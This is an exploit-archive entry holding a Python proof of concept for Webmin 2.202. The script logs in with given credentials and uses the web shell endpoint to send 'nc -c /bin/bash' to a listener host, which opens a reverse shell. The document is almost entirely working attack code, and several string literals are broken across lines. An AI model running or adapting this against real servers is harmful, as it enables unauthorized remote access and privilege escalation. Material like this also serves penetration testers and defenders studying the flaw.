# Exploit Title: Webmin RCE Leading to Privilege Escalation
# Google Dork: N/A
# Date: 05-03-2025
# Exploit Author: Buğra Enis Dönmez
# Vendor Homepage: https://webmin.com/
# Software Link: https://webmin.com/
# Version: 2.202
# Tested on: Windows
# Python POC
import requests
import argparse
import sys
import time
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-rhost", required=True, help="Target IP address")
parser.add_argument("-rport", required=True, help="Target port")
parser.add_argument("-u", required=True, help="Username")
parser.add_argument("-p", required=True, help="Password")
parser.add_argument("-lhost", required=True, help="Listener IP address")
parser.add_argument("-lport", required=True, help="Listener port")
args = parser.parse_args()
login_url = f"https://{args.rhost}:{args.rport}/session_login.cgi"
command_url = f"https://{args.rhost}:{args.rport}/shell/index.cgi"
login_data = {
"user": args.u,
"pass": args.p
}
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;
rv:134.0) Gecko/20100101 Firefox/134.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
"Referer": f"https://
{args.rhost}:{args.rport}/session_login.cgi?logout=1",
"Origin": f"https://{args.rhost}:{args.rport}",
"Connection": "keep-alive",
"Upgrade-Insecure-Requests": "1",
"Cookie": "redirect=1; testing=1; sid=x"
}
session = requests.Session()
try:
print("Attempting to log in...")
time.sleep(2)
response = session.post(login_url, headers=headers,
data=login_data, verify=False, allow_redirects=False)
if response.status_code == 302:
set_cookie_header = response.headers.get("Set-Cookie")
if set_cookie_header and "sid=" in set_cookie_header:
sid = set_cookie_header.split("sid=")[1].split(";")[0]
print("Login successful!")
time.sleep(2)
headers["Cookie"] = f"redirect=1; testing=1; sid={sid}"
print(f"Check your listener on {args.lhost}:{args.lport}")
time.sleep(2)
boundary =
"---------------------------30454280098212925122759899223"
payload = f"nc -c /bin/bash {args.lhost} {args.lport}"
command_data = (
f"{boundary}\r\n"
f"Content-Disposition: form-data;
name=\"cmd\"\r\n\r\n{payload}\r\n"
f"{boundary}\r\n"
f"Content-Disposition: form-data;
name=\"pwd\"\r\n\r\n/root\r\n"
f"{boundary}\r\n"
f"Content-Disposition: form-data;
name=\"history\"\r\n\r\n\r\n"
f"{boundary}--\r\n"
)
headers["Content-Type"] = f"multipart/form-data;
boundary={boundary.strip('-')}"
session.post(command_url, headers=headers,
data=command_data, verify=False)
sys.exit(0)
else:
print("Login failed: SID not found.")
sys.exit(1)
else:
print("Login failed.")
sys.exit(1)
except requests.exceptions.RequestException as e:
print("An error occurred during the request.")
sys.exit(1)
except Exception as e:
print(f"An unexpected error occurred: {e}")
sys.exit(1)
if __name__ == "__main__":
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
main()
